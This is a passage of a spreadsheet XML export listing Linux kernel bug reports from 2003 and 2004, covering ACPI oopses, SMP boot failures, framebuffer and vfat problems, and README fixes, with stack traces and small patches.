[&lt;c0312f04&gt;] kfree_skbmem+0x14/0x30 Nov 23 20:00:07 shal kernel: [&lt;c0312f86&gt;] __kfree_skb+0x66/0xd0 Nov 23 20:00:07 shal kernel: [&lt;c033b4d8&gt;] tcp_recvmsg+0xb18/0xe10 Nov 23 20:00:07 shal kernel: [&lt;c035f574&gt;] inet_recvmsg+0x54/0x70 Nov 23 20:00:07 shal kernel: [&lt;c030ecf4&gt;] sock_aio_read+0xc4/0xe0 Nov 23 20:00:07 shal kernel: [&lt;c0170212&gt;] do_sync_read+0xc2/0x100 Nov 23 20:00:07 shal kernel: [&lt;c014c5d2&gt;] __get_free_pages+0x22/0x50 Nov 23 20:00:07 shal kernel: [&lt;c0122c20&gt;] autoremove_wake_function+0x0/0x50 Nov 23 20:00:07 shal kernel: [&lt;c0188d1a&gt;] poll_freewait+0x3a/0x50 Nov 23 20:00:07 shal kernel: [&lt;c0170331&gt;] vfs_read+0xe1/0x120 Nov 23 20:00:07 shal kernel: [&lt;c01705cf&gt;] sys_read+0x3f/0x60 Nov 23 20:00:07 shal kernel: [&lt;c03793ff&gt;] syscall_call+0x7/0xb Nov 23 20:00:07 shal kernel: Nov 23 20:00:07 shal kernel: Code: 8b 5e 38 e9 2b ff ff ff 8b 45 e8 03 86 b8 00 00 00 89 74 24 04 c7 44 24 08 05 00 00 00 89 04 24 ff 56 78 8b 5e 38 e9 f8 fe ff ff &lt;0f&gt; 0b ac 06 d7 af 38 c0 e9 e2 fe ff ff 0f 0b ab 06 d7 af 38 c0 Steps to reproduce: don't know , but I have it few times.</t>
  </si>
  <si>
    <t>Anders Kaseorg</t>
  </si>
  <si>
    <t>oops on boot if ACPI - 2.4 SMP specific - P3/VIA/Award</t>
  </si>
  <si>
    <t>2.4.23-rc3</t>
  </si>
  <si>
    <t>2003-11-27 11:27 UTC</t>
  </si>
  <si>
    <t>2004-03-09 02:36 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Sid Hardware Environment: Dual P3, d6vaa elitegroup motherboard, 256 mb ram, ide discs Problem Description: I have this oops when I enable acpi in 2.4.23-rc3. It started happening at least in 2.4.22. Sorry for not reporting it before, but usually I don't use acpi (my bios seems to be screwed so usually I just turn it off) and when it works alsa stops working (the sound card uses another interrupt and esd doesn't seem to work very well with whatever changes there're), so I sent this hoping it can solve problems to other people. PCI: Using configuration type 1. tbxface-0117[03] acpi_load_tables :ACPI tables sucesfully acquired Parsing all control methods (lots of points) Table[DSDT] (id F004) - 383 objects with 31 devices 83 methods 29 regions ACPI Namespace sucesfully loaded at root c0369cfc IOAPIC[0]: Set PCI routing entry (2-11 -&gt; 0x81 -&gt; IRQ11 Mode: 0 Active: 0) evxfvent-0093 [04] acpi_enable: Transition to ACPI mode sucesfull evgpeblk-0748 [06] ev_create_gpe_back: GPE-00 to 15 [_GPE] 2 regs at 0000000000004020 on int 11 ksymoops 2.4.9 on i686 2.6.0-test9-mm5. Options used -V (default) -k /proc/ksyms (default) -l /proc/modules (default) -o /lib/modules/2.6.0-test9-mm5/ (default) -m /boot/System.map-2.4.23-rc3 (specified) Error (regular_file): read_ksyms stat /proc/ksyms failed No modules in ksyms, skipping objects No ksyms, skipping lsmod Unable to handle kernel NULL pointer dereference at virtual address 00000018 00000018 *pde = 00000000 EIP: 0010:[&lt;00000018&gt;] Not Tainted Using defaults from ksymoops -t elf32-i386 -a i386 EFLAGS: 00010246 eax: 00000000 ebx: c01053d0 ecx: 00000010 edx: dffe8000 esi: dffe8000 edi: dffe8000 ebp: ffffe000 esp: dffe9fb0 Stack: c0105492 00000002 00000000 00000000 00000000 c011bf45 00000c93 00000282 ffffffff 34000000 00000001 00000000 00000001 c035c12a 00000246 00000029 000000ff c011c1bf 00000000 00000400 Call trace: [&lt;c0105492&gt;] [&lt;c011bf45&gt;] [&lt;c011c1bf&gt;] Code: Bad EIP value &gt;&gt;EIP; 00000018 Before first symbol &lt;===== &gt;&gt;ebx; c01053d0 &lt;default_idle+0/50&gt; Trace; c0105492 &lt;cpu_idle+52/70&gt; Trace; c011bf45 &lt;call_console_drivers+65/120&gt; Trace; c011c1bf &lt;printk+14f/180&gt; &lt;0&gt;Kernel Panic: Attempted to kill idle task! 1 error issued. Results may not be reliable.</t>
  </si>
  <si>
    <t>kernel-2.4.22 c</t>
  </si>
  <si>
    <t>2003-11-29 01:33 UTC</t>
  </si>
  <si>
    <t>Igor Blinov</t>
  </si>
  <si>
    <t>2004-07-20 13:33 UTC</t>
  </si>
  <si>
    <t>Marcelo Tosatti</t>
  </si>
  <si>
    <t>Distribution: RH9 Hardware Environment: AMD Athlon 1333 on AMD760 chipset and ATi Radeon 9200SE Software Environment: kernel Problem Description: does not support framebuffer for ATi Radeon 9200SE Steps to reproduce: boot kernel Patch: --- pci_ids.h 2003-08-25 15:44:44.000000000 +0400 +++ pci_ids.h.new 2003-11-04 20:31:18.000000000 +0300 @@ -287,6 +287,7 @@ #define PCI_DEVICE_ID_ATI_RADEON_Ig 0x4967 /* Radeon RV280 (9200) */ #define PCI_DEVICE_ID_ATI_RADEON_Y_ 0x5960 +#define PCI_DEVICE_ID_ATI_RADEON_Yd 0x5964 /* Radeon R300 (9700) */ #define PCI_DEVICE_ID_ATI_RADEON_ND 0x4e44 #define PCI_DEVICE_ID_ATI_RADEON_NE 0x4e45 --- radeonfb.c 2003-08-25 15:44:42.000000000 +0400 +++ radeonfb.c.new 2003-11-05 23:33:13.000000000 +0300 @@ -202,6 +202,7 @@ RADEON_If, RADEON_Ig, RADEON_Y_, + RADEON_Yd, RADEON_Ld, RADEON_Le, RADEON_Lf, @@ -261,6 +262,7 @@ { "9000 If", RADEON_RV250 }, { "9000 Ig", RADEON_RV250 }, { "9200 Y", RADEON_RV280 }, + { "9200 Yd", RADEON_RV280 }, { "M9 Ld", RADEON_M9 }, { "M9 Le", RADEON_M9 }, { "M9 Lf", RADEON_M9 }, @@ -326,6 +328,7 @@ { PCI_VENDOR_ID_ATI, PCI_DEVICE_ID_ATI_RADEON_NH, PCI_ANY_ID, PCI_ANY_ID, 0, 0, RADEON_NH}, { PCI_VENDOR_ID_ATI, PCI_DEVICE_ID_ATI_RADEON_NI, PCI_ANY_ID, PCI_ANY_ID, 0, 0, RADEON_NI}, { PCI_VENDOR_ID_ATI, PCI_DEVICE_ID_ATI_RADEON_Y_, PCI_ANY_ID, PCI_ANY_ID, 0, 0, RADEON_Y_}, + { PCI_VENDOR_ID_ATI, PCI_DEVICE_ID_ATI_RADEON_Yd, PCI_ANY_ID, PCI_ANY_ID, 0, 0, RADEON_Yd}, { PCI_VENDOR_ID_ATI, PCI_DEVICE_ID_ATI_RADEON_AD, PCI_ANY_ID, PCI_ANY_ID, 0, 0, RADEON_AD}, { PCI_VENDOR_ID_ATI, PCI_DEVICE_ID_ATI_RADEON_AP, PCI_ANY_ID, PCI_ANY_ID, 0, 0, RADEON_AP}, { PCI_VENDOR_ID_ATI, PCI_DEVICE_ID_ATI_RADEON_AR, PCI_ANY_ID, PCI_ANY_ID, 0, 0, RADEON_AR},</t>
  </si>
  <si>
    <t>Should call method _PSx</t>
  </si>
  <si>
    <t>2.4, 2.6</t>
  </si>
  <si>
    <t>2003-12-01 03:01 UTC</t>
  </si>
  <si>
    <t>2004-04-01 01:57 UTC</t>
  </si>
  <si>
    <t>Andy said: " The other bug this highlights is that ACPI expects the OS to call _PSx control methods. Someone (the ACPI bus driver?) should be calling _PS0 on EC0 when the EC device is found and its driver is loaded. I don't believe Linux is doing this yet, although it should be (and also calling _PS3 when entering sleep states etc.) Not doing this could be the source of lots of other bugs besides just this one. "</t>
  </si>
  <si>
    <t>Dell PE4600 requires SCI w/ level polarity w/o override -- IO-APIC</t>
  </si>
  <si>
    <t>2003-12-01 18:45 UTC</t>
  </si>
  <si>
    <t>2004-05-14 23:12 UTC</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: Dell poweredge 3600 Steps to reproduce: the box lacks SCI overriding. Current code will set SCI to edge state in the box. But SCI must be level in the box. related Bug:Bug 774</t>
  </si>
  <si>
    <t>2003-12-02 03:56 UTC</t>
  </si>
  <si>
    <t>According to ACPI spec 7.2.12- 7.2.15, Kernel should use _SxD to get the highest power D-state supported by this device in Sx system sleeping state. Kernel seems to lack this kind of information.</t>
  </si>
  <si>
    <t>vfat bug on offlined SCSI device</t>
  </si>
  <si>
    <t>2003-12-02 14:02 UTC</t>
  </si>
  <si>
    <t>Ernst Bachmann</t>
  </si>
  <si>
    <t>2003-12-21 06:14 UTC</t>
  </si>
  <si>
    <t>Distribution: gentoo linux Hardware Environment: (Faulty) IDE Disc attached via USB2. Appears as scsi device on linux. (usb-storage driver) Software Environment: well, "mount" and "cp". Problem Description: This particular USB disk has a hardware/firmware failure, so it occasionally just stops to work. The usb-storage driver then sets the device to "offline", which causes lots of problems with the vfat filesystem driver: This is how the device is detected: --- cut ---- Dec 2 22:25:44 roadrunner kernel: hub 4-3:1.0: new USB device on port 3, assigned address 4 Dec 2 22:25:45 roadrunner kernel: Initializing USB Mass Storage driver... Dec 2 22:25:45 roadrunner kernel: scsi0 : SCSI emulation for USB Mass Storage devices Dec 2 22:25:46 roadrunner kernel: Vendor: USB 2.0 Model: Storage Device Rev: 0100 Dec 2 22:25:46 roadrunner kernel: Type: Direct-Access ANSI SCSI revision: 02 Dec 2 22:25:46 roadrunner kernel: SCSI device sda: 241254720 512-byte hdwr sectors (123522 MB) Dec 2 22:25:46 roadrunner kernel: sda: assuming drive cache: write through Dec 2 22:25:46 roadrunner kernel: /dev/scsi/host0/bus0/target0/lun0: p1 p2 Dec 2 22:25:46 roadrunner kernel: Attached scsi disk sda at scsi0, channel 0, id 0, lun 0 Dec 2 22:25:46 roadrunner kernel: Attached scsi generic sg0 at scsi0, channel 0, id 0, lun 0, type 0 Dec 2 22:25:46 roadrunner kernel: WARNING: USB Mass Storage data integrity not assured Dec 2 22:25:46 roadrunner kernel: USB Mass Storage device found at 4 Dec 2 22:25:46 roadrunner kernel: drivers/usb/core/usb.c: registered new driver usb-storage Dec 2 22:25:46 roadrunner kernel: USB Mass Storage support registered. --- cut ---- Ok, now I mount the partition (vfat filesystem) and copy a few files over. Now if the disc fails while copying, this happens: --- cut --- Dec 2 22:28:33 roadrunner kernel: block 120787408 Dec 2 22:28:33 roadrunner kernel: lost page write due to I/O error on sda1 Dec 2 22:28:33 roadrunner kernel: Buffer I/O error on device sda1, logical block 120787409 Dec 2 22:28:33 roadrunner kernel: lost page write due to I/O error on sda1 Dec 2 22:28:33 roadrunner kernel: Buffer I/O error on device sda1, logical block 120787410 Dec 2 22:28:33 roadrunner kernel: lost page write due to I/O error on sda1 ..... Dec 2 22:28:33 roadrunner kernel: lost page write due to I/O error on sda1 Dec 2 22:28:33 roadrunner kernel: scsi0 (0:0): rejecting I/O to offline device Dec 2 22:28:33 roadrunner kernel: Buffer I/O error on device sda1, logical block 1 Dec 2 22:28:33 roadrunner kernel: lost page write due to I/O error on sda1 Dec 2 22:28:33 roadrunner kernel: scsi0 (0:0): rejecting I/O to offline device Dec 2 22:28:33 roadrunner kernel: Buffer I/O error on device sda1, logical block 117372 Dec 2 22:28:33 roadrunner kernel: lost page write due to I/O error on sda1 Dec 2 22:28:33 roadrunner kernel: Buffer I/O error on device sda1, logical block 117373 Dec 2 22:28:33 roadrunner kernel: lost page write due to I/O error on sda1 Dec 2 22:28:33 roadrunner kernel: Buffer I/O error on device sda1, logical block 117374 Dec 2 22:28:33 roadrunner kernel: lost page write due to I/O error on sda1 Dec 2 22:28:33 roadrunner kernel: Buffer I/O error on device sda1, logical block 117375 Dec 2 22:28:33 roadrunner kernel: lost page write due to I/O error on sda1 Dec 2 22:28:33 roadrunner kernel: scsi0 (0:0): rejecting I/O to offline device ........ Dec 2 22:28:33 roadrunner kernel: FAT: bread(block 117620) in fat_access failed Dec 2 22:28:33 roadrunner kernel: scsi0 (0:0): rejecting I/O to offline device Dec 2 22:28:33 roadrunner kernel: FAT: bread(block 117620) in fat_access failed Dec 2 22:28:33 roadrunner kernel: scsi0 (0:0): rejecting I/O to offline device Dec 2 22:28:33 roadrunner kernel: FAT: bread(block 117620) in fat_access failed Dec 2 22:28:33 roadrunner kernel: scsi0 (0:0): rejecting I/O to offline device Dec 2 22:28:33 roadrunner kernel: FAT: bread(block 117620) in fat_access failed Dec 2 22:28:33 roadrunner kernel: scsi0 (0:0): rejecting I/O to offline device Dec 2 22:28:33 roadrunner kernel: FAT: bread(block 117620) in fat_access failed --- cut --- the last two messages (bread failed + rejecting io) are now repeated (with different blockno's) a few million times, often enough to fill the entire root fs with syslogd/klogd logfiles. The application accessing the filesystem could not be killed while this happened, it did not react to any signals. After killing syslog, I had to reboot in order to get rid of the "cp" task. Steps to reproduce: Not sure since I have that faulty hardware on my USB disk... but perhaps its enough to simply unplugg an usb storage device while copying to it to reproduce the bug. I'm posting this bug to SCSI and not usb-storage or vfat, cause it worked better with the -test9 kernel, and the changelog mainly contains scsi-changes.</t>
  </si>
  <si>
    <t>on ?critical? overheat halts without any notice</t>
  </si>
  <si>
    <t>linux-2.6.0-test11</t>
  </si>
  <si>
    <t>2003-12-02 14:48 UTC</t>
  </si>
  <si>
    <t>maximilian attems</t>
  </si>
  <si>
    <t>2004-04-13 23:26 UTC</t>
  </si>
  <si>
    <t>Distribution: debian sarge Hardware Environment: gericom webgine Software Environment: Problem Description: happens while high cpu load on newer acpi witout any notice (filesystems are not umounted!), see also reports at lkml http://marc.theaimsgroup.com/?l=linux-kernel&amp;m=107003843711259&amp;w=2 cat /proc/acpi/thermal_zone/THRM/trip_points critical (S5): 85 C active[0]: 70 C: devices=0xc15102e0 Steps to reproduce: compile wine and your laptop will definetly shutdown</t>
  </si>
  <si>
    <t>release locks for error path in acpi_ps_execute</t>
  </si>
  <si>
    <t>2003-12-02 18:19 UTC</t>
  </si>
  <si>
    <t>felipe_alfaro@linuxmail.org said "While looking at drivers/acpi/parse/psxfac.c, I have noticed that the acpi_psx_execute() function seems to held some structures when and error occurs during its execution...."</t>
  </si>
  <si>
    <t>Configure.help has typos and minor language problems</t>
  </si>
  <si>
    <t>2.6.5</t>
  </si>
  <si>
    <t>2003-12-03 14:39 UTC</t>
  </si>
  <si>
    <t>Philip White</t>
  </si>
  <si>
    <t>2004-08-13 17:27 UTC</t>
  </si>
  <si>
    <t>Configure.help has typos and minor language problems, so I am taking the liberty of going through the entire file and making necessary corrections. If anyone has a problem with this, let me know now so that my time is not wasted. I am opening this so that no one duplicates this effort. (Yeah, that's a real threat!)</t>
  </si>
  <si>
    <t>nosmp or "maxcpus=0" fails if ACPI+IOAPIC</t>
  </si>
  <si>
    <t>2003-12-03 21:59 UTC</t>
  </si>
  <si>
    <t>2007-08-25 21:02 UTC</t>
  </si>
  <si>
    <t>ykzhao</t>
  </si>
  <si>
    <t>The "nosmp" option causes the SMP kernel to skip setup_IO_APIC(). ACPI doesn't get the word and still enables PCI interrupts on the uninitialized IOAPIC, which doesn't work. One would think that disabling the IOAPIC would be the domain of "noapic", and that one should be able to run an SMP max_cpus=0 kernel with the APIC still enabled... Example in bug 1607 attachment 1610 [details] and attachment 1611 [details]</t>
  </si>
  <si>
    <t>S3: enable on SMP</t>
  </si>
  <si>
    <t>2003-12-03 23:48 UTC</t>
  </si>
  <si>
    <t>2005-07-24 19:14 UTC</t>
  </si>
  <si>
    <t>2449 4261</t>
  </si>
  <si>
    <t>echo -n 1 &gt; /proc/acpi/sleep ause nothing happend on SMP box</t>
  </si>
  <si>
    <t>README errors about floppy booting and module building</t>
  </si>
  <si>
    <t>2003-12-04 01:42 UTC</t>
  </si>
  <si>
    <t>David Balažic</t>
  </si>
  <si>
    <t>2004-06-19 17:31 UTC</t>
  </si>
  <si>
    <t>Distribution: none Hardware Environment: N/A Software Environment: N/A Problem Description: The linu/README file has the following errors : - quote : If you configured any of the parts of the kernel as `modules', you will have to do "make modules" followed by "make modules_install". AFAIK, modules are made by just "make", so this sentence might be wrong. - quote : For some, this is on a floppy disk, in which case you can copy the kernel bzImage file to /dev/fd0 to make a bootable floppy. This does not work in 2.6.x anymore. Steps to reproduce: Read the README ...</t>
  </si>
  <si>
    <t>APIC_HEADER definition removed</t>
  </si>
  <si>
    <t>2003-12-04 16:28 UTC</t>
  </si>
  <si>
    <t>2004-04-13 09:46 UTC</t>
  </si>
  <si>
    <t>Distribution: 20031202 Hardware Environment: Software Environment: Problem Description: In ACPI-CA 20031202, the definition for APIC header disappeared. This breaks our MADT code. Please consider adding this structure to actbl.h, in line with the new definition for ACPI_TABLE_HEADER: typedef struct apic_header { APIC_HEADER_DEF } APIC_HEADER;</t>
  </si>
  <si>
    <t>Problems with 1203 ACPI-CA dist</t>
  </si>
  <si>
    <t>2003-12-08 10:40 UTC</t>
  </si>
  <si>
    <t>2004-03-04 13:00 UTC</t>
  </si>
  <si>
    <t>There are two errors I found in this distribution. 1. Extraneous reference to NewObj generates a warning. Fix: delete like 703 of dsmthdat.c (NewObj;) 2. Local APIC override definition uses a 32 bit address when the actual value is 64 bits. See section 5.2.10.11 in the ACPI spec. Fix: Change definition for MADT_ADDRESS_OVERRIDE.Address to be 64 bits in actbl.h</t>
  </si>
  <si>
    <t>SCI interrupt lost after resuming from S3</t>
  </si>
  <si>
    <t>2003-12-09 04:07 UTC</t>
  </si>
  <si>
    <t>2004-06-09 23:57 UTC</t>
  </si>
  <si>
    <t>SCI interrupt alwasy lost after resuming from S3 on T21. After resuming from S3, if you press power button, nothing happend.</t>
  </si>
  <si>
    <t>Missing PCI devices in ACPI mode; _BBN 0 - Asus PR-DLS/ServerWorks CMIC-LE</t>
  </si>
  <si>
    <t>2003-12-09 14:34 UTC</t>
  </si>
  <si>
    <t>Andrew Walrond</t>
  </si>
  <si>
    <t>2004-11-03 15:25 UTC</t>
  </si>
  <si>
    <t>1127 1585 1674 1741</t>
  </si>
  <si>
    <t>Asus PR-DLS Dual Xeon (P4) motherboard 2.6.0-test11 kernel with acpi configured. If I boot normally, the e1000 device is not recognised. If I boot with pci=noacpi, the e1000 is recognised ( but e100/e1000 are assigned opposite ethx compared to 2.4) lspci in both cases gives these devices 00:00.0 Host bridge: ServerWorks CMIC-LE (rev 13) 00:00.1 Host bridge: ServerWorks CMIC-LE 00:00.2 Host bridge: ServerWorks: Unknown device 0000 00:02.0 Ethernet controller: Intel Corp. 82557/8/9 [Ethernet Pro 100] (rev 10) 00:03.0 VGA compatible controller: ATI Technologies Inc Rage XL (rev 27) 00:0f.0 ISA bridge: ServerWorks CSB5 South Bridge (rev 93) 00:0f.1 IDE interface: ServerWorks CSB5 IDE Controller (rev 93) 00:0f.3 Host bridge: ServerWorks GCLE Host Bridge 00:10.0 Host bridge: ServerWorks: Unknown device 0101 (rev 03) 00:10.2 Host bridge: ServerWorks: Unknown device 0101 (rev 03) 00:11.0 Host bridge: ServerWorks: Unknown device 0101 (rev 03) 00:11.2 Host bridge: ServerWorks: Unknown device 0101 (rev 03) But these extra devices only appear when booting with pci=noacpi. Net access to a machine can also be arranged if it would help 02:04.0 SCSI storage controller: LSI Logic / Symbios Logic 53c1030 (rev 07) 02:04.1 SCSI storage controller: LSI Logic / Symbios Logic 53c1030 (rev 07) 03:02.0 Ethernet controller: Intel Corp. 82544GC Gigabit Ethernet Controller (LOM) (rev 02) If I can give any further info, let me know. As a seperate issue, with pci=noacpi, both the net interfaces are recognised, but in reverse order to 2.4 kernel (eth0 &lt;=&gt; eth1)</t>
  </si>
  <si>
    <t>slab corruption in 'hpsb_packet'</t>
  </si>
  <si>
    <t>2.6.0-0.test11.1.12</t>
  </si>
  <si>
    <t>2003-12-10 13:09 UTC</t>
  </si>
  <si>
    <t>Jason Duerstock</t>
  </si>
  <si>
    <t>Distribution: RedHat fedora development Hardware Environment: P3-500, 256 MB RAM, IDE and IEEE1394 controllers, 1 IEEE1394 hard disk Software Environment: RedHat fedora development Problem Description: Slab corruption: start=c12b2758, expend=c12b27b7, problemat=c12b2788 Last user: [&lt;d08db100&gt;](free_hpsb_packet+0x1d/0x22 [ieee1394]) Data: ************************************************D5 D6 D6 D6 01 00 00 00 ***************************************A5 Next: 71 F0 2C .00 B1 8D D0 71 F0 2C ..................... slab error in check_poison_obj(): cache `hpsb_packet': object was modified after freeing Call Trace: [&lt;c01321f9&gt;] check_poison_obj+0x132/0x13a [&lt;c0132235&gt;] slab_destroy+0x34/0x156 [&lt;c013402e&gt;] reap_timer_fnc+0x134/0x190 [&lt;c0133efa&gt;] reap_timer_fnc+0x0/0x190 [&lt;c011fd8d&gt;] run_timer_softirq+0x119/0x139 [&lt;c010b586&gt;] handle_IRQ_event+0x27/0x4a [&lt;c011c4f9&gt;] do_softirq+0x45/0x87 [&lt;c010b820&gt;] do_IRQ+0xdf/0xe9 [&lt;c0105000&gt;] _stext+0x0/0x19 [&lt;c010a3d0&gt;] common_interrupt+0x18/0x20 [&lt;c0105000&gt;] _stext+0x0/0x19 [&lt;c01080cf&gt;] default_idle+0x23/0x26 [&lt;c0108120&gt;] cpu_idle+0x1f/0x34 [&lt;c031c5bb&gt;] start_kernel+0x15e/0x162 Steps to reproduce: boot kernel with ieee1394 drive attached</t>
  </si>
  <si>
    <t>2.4 2.6</t>
  </si>
  <si>
    <t>2.6.7-rc3</t>
  </si>
  <si>
    <t>Young-Ho Cha</t>
  </si>
  <si>
    <t>screen content garbled when using matroxfb on matrox g550</t>
  </si>
  <si>
    <t>2003-12-15 02:32 UTC</t>
  </si>
  <si>
    <t>markus</t>
  </si>
  <si>
    <t>Distribution:gentoo - sources Hardware Environment: matrox g550 (MGA G550 AGP (rev 01)), asus p4s8x mainboard (sis 648 chipset), adaptec 19160 scsi, ps/2 mouse &amp; kdb,... Software Environment: linux 2.6.0-test11 Problem Description: when using a kernel with compiled in framebuffer support or loading the matroxfb module at boot, the screen stays blank. when loading the matroxfb module at a later time, screen content gets garbled. remote logins however, are still possible. dmesg says: matroxfb: Matrox G550 detected matroxfb: MTRR's turned on matroxfb: 640x480x8bpp (virtual: 640x65536) matroxfb: framebuffer at 0xFC000000, mapped to 0xe0812000, size 33554432 fb0: MATROX frame buffer device fb0: initializing hardware the problem exists when using the analog out of the matrox card, as well as with the dvi interface. Steps to reproduce: #modprobe matroxfb_base --on a system with matrox g550 or boot a kernel with compiled in matroxfb support, or kernel option video=matroxfb on a system with a matrox g550 markus</t>
  </si>
  <si>
    <t>break the loop, if next resource is out of buffer.</t>
  </si>
  <si>
    <t>2003-12-16 00:36 UTC</t>
  </si>
  <si>
    <t>Currently implementation of acpi_walk_resources will be a dead loop, if ACPI_NEXT_RESOURCE(resource) is out of buffer.</t>
  </si>
  <si>
    <t>ex_access_region      Region EmbeddedControl(3) has no handler</t>
  </si>
  <si>
    <t>2003-12-17 02:55 UTC</t>
  </si>
  <si>
    <t>2005-11-20 16:26 UTC</t>
  </si>
  <si>
    <t>1515 2310 2541 2667</t>
  </si>
  <si>
    <t>EC._INI will fail, if there is no ec address space handler. To resolve this problem ECDT has been introduced. But there are many laptop lack ECDT. How about deferring the execution of EC._INI to later when the real EC address space handler has been installed.</t>
  </si>
  <si>
    <t>2006-09-28 13:10 UTC</t>
  </si>
  <si>
    <t>Centrino's Speedstep is not detected correctly</t>
  </si>
  <si>
    <t>2003-12-18 02:16 UTC</t>
  </si>
  <si>
    <t>Bernd Wurst</t>
  </si>
  <si>
    <t>2004-06-02 09:42 UTC</t>
  </si>
  <si>
    <t>I used to use /proc/acpi/processor/.../performance to set Centrino's 5 performance states via userspace daemon. Now in linux 2.6.0, I configured the kernel ACPI to include "processor" and I configured SpeedStep to support the "deprecated" acpi performance interface as well as anything else I think I have to turn on for cpufreq. But after booting 2.6, I have /proc/acpi/processor/.../ but without "performance" in it. "info" says +----- | processor id: 0 | acpi id: 0 | bus mastering control: yes | power management: yes | throttling control: no | performance management: no | limit interface: yes +----- So it seems like "performance" is not supported even if I select it in kernel config. Additionally, I do not find anything cpufreq-related in /sys/. dmesg|grep "cpufreq" says: +----- | cpufreq: No CPUs supporting ACPI performance management found. +----- In 2.4, everything is fine...</t>
  </si>
  <si>
    <t>Bad config dependencies with CONFIG_BLK_DEV_IDE &amp;&amp; CONFIG_BLK_DEV_IDE_PMAC</t>
  </si>
  <si>
    <t>2003-12-18 09:45 UTC</t>
  </si>
  <si>
    <t>Carlos Perell</t>
  </si>
  <si>
    <t>Distribution: Vanilla kernel Hardware Environment: PowerPC G4 Software Environment: Debian GNU/Linux SID Problem Description: If you select the CONFIG_BLK_DEV_IDE as a module, it only lets you select the CONFIG_BLK_DEV_IDE_PMAC as built-in and then you see compilation errors: arch/ppc/platforms/built-in.o(.init.text+0xd9e): En la funci</t>
  </si>
  <si>
    <t>Arjan van de Ven</t>
  </si>
  <si>
    <t>Armin Schindler</t>
  </si>
  <si>
    <t>README: wrong make instructions?</t>
  </si>
  <si>
    <t>2003-12-19 03:15 UTC</t>
  </si>
  <si>
    <t>Frederic Wenzel</t>
  </si>
  <si>
    <t>2004-01-25 00:45 UTC</t>
  </si>
  <si>
    <t>Problem Description: The main kernel readme file seems to give wrong make instructions when using a different "build" directory: make ... install_modules install doesn't work, I think it has to be: make ... modules modules_install Steps to reproduce: read the main kernel README file, ~ line 120 Solution: apply the following patch... diff -Nru l260-orig/README l260-new/README --- l260-orig/README 2003-12-19 12:05:36.000000000 +0100 +++ l260-new/README 2003-12-19 12:11:42.000000000 +0100 @@ -119,7 +119,7 @@ cd /usr/src/linux-2.6.N make O=/home/name/build/kernel menuconfig make O=/home/name/build/kernel - sudo make O=/home/name/build/kernel install_modules install + sudo make O=/home/name/build/kernel modules modules_install Please note: If the 'O=output/dir' option is used then it must be used for all invocations of make.</t>
  </si>
  <si>
    <t>problem with SMP boot with 2.4.22 and acpi-20031203</t>
  </si>
  <si>
    <t>2003-12-19 08:07 UTC</t>
  </si>
  <si>
    <t>Sergey Vlasov</t>
  </si>
  <si>
    <t>2004-04-15 12:30 UTC</t>
  </si>
  <si>
    <t>After updating ACPI patch version from 21-Nov-2003 to 11-Dec-2003 (acpi-20031203-2.4.22.diff), a problem with booting on an SMP (P4 HT) machine was reported: booting takes about 3 minutes, and kernel complains about not responding processors: Booting processor 2/32 eip 3000 Not responding. Booting processor 2/33 eip 3000 Not responding. Booting processor 2/64 eip 3000 Not responding. Booting processor 2/65 eip 3000 Not responding. Booting processor 2/96 eip 3000 Not responding. Booting processor 2/97 eip 3000 Not responding. Booting processor 2/128 eip 3000 Not responding. Booting processor 2/129 eip 3000 Not responding. Booting processor 2/160 eip 3000 Not responding. Booting processor 2/161 eip 3000 Not responding. Booting processor 2/192 eip 3000 Not responding. Booting processor 2/193 eip 3000 Not responding. Booting processor 2/224 eip 3000 Not responding. Booting processor 2/225 eip 3000 Not responding. Total of 2 processors activated (9620.68 BogoMIPS). (full dmesg output is attached separately). Even acpi=off does not fix this problem (so the common SMP boot code seems to be broken by this patch). With maxcpus=2 the kernel boots as expected. It seems that the problem is caused by this chunk of the patch: diff -Nru a/arch/i386/kernel/smpboot.c b/arch/i386/kernel/smpboot.c --- a/arch/i386/kernel/smpboot.c Fri Dec 12 00:22:07 2003 +++ b/arch/i386/kernel/smpboot.c Fri Dec 12 00:22:07 2003 @@ -1106,7 +1106,7 @@ */ Dprintk("CPU present map: %lx\n", phys_cpu_present_map); - for (bit = 0; bit &lt; NR_CPUS; bit++) { + for (bit = 0; bit &lt; MAX_APICS; bit++) { apicid = cpu_present_to_apicid(bit); /* * Don't even attempt to start the boot CPU! MAX_APICS is 256 (the kernel was compiled with CONFIG_X86_CLUSTERED_APIC), but the hardware does not use clustered APIC mode, therefore cpu_present_to_apicid(bit) == bit, and later in the loop (1ul &lt;&lt; bit) value becomes undefined when bit &gt;= 32. Actually the CPU calculates (1UL &lt;&lt; (bit &amp; 0x1F)), therefore the code attempts to activate processors 32 and 33, 64 and 65, etc. In 2.4.23 the code was slightly changed; however, if the clustered APIC mode is not used, the same shift with out-of-range number of bits would be performed in apicid_to_phys_cpu_present(), with the same results (not tested actually). The latest ACPI patch (acpi-20031203-2.4.22.diff from 18-Dec-2003) was not tested too, but the problematic part of code was not changed...</t>
  </si>
  <si>
    <t>via82cxxx cdrom problem</t>
  </si>
  <si>
    <t>2003-12-19 09:41 UTC</t>
  </si>
  <si>
    <t>Marc poulhi</t>
  </si>
  <si>
    <t>2004-02-05 07:47 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian GNU/Linux sid Hardware Environment: Intel Software Environment: Problem Description: When loading the module via82cxxx, i've got these messages: hda: ERROR, PORTS ALREADY IN USE register_blkdev: cannot get major 3 for ide0 ide1: I/O resource 0x376-0x376 not free. hdc: ERROR, PORTS ALREADY IN USE I can't find exactly what is means, but i can't access my cdrom (hdc) after having loaded the modules (as if it doesn't exist). A workaround is to load the cdrom stuff (ide-cd / cdrom) before this one. I still got the message but it seems to work. I don't think it is a BIOS problem as everything is ok with 2.4.x. Steps to reproduce: load via82cxxx before ide-cd/cdrom, then try to access cdroms.</t>
  </si>
  <si>
    <t>drivers_sound</t>
  </si>
  <si>
    <t>Michael</t>
  </si>
  <si>
    <t>kswapd causes oops</t>
  </si>
  <si>
    <t>2003-12-20 03:29 UTC</t>
  </si>
  <si>
    <t>Daniel Schreiber</t>
  </si>
  <si>
    <t>2004-07-18 14:14 UTC</t>
  </si>
  <si>
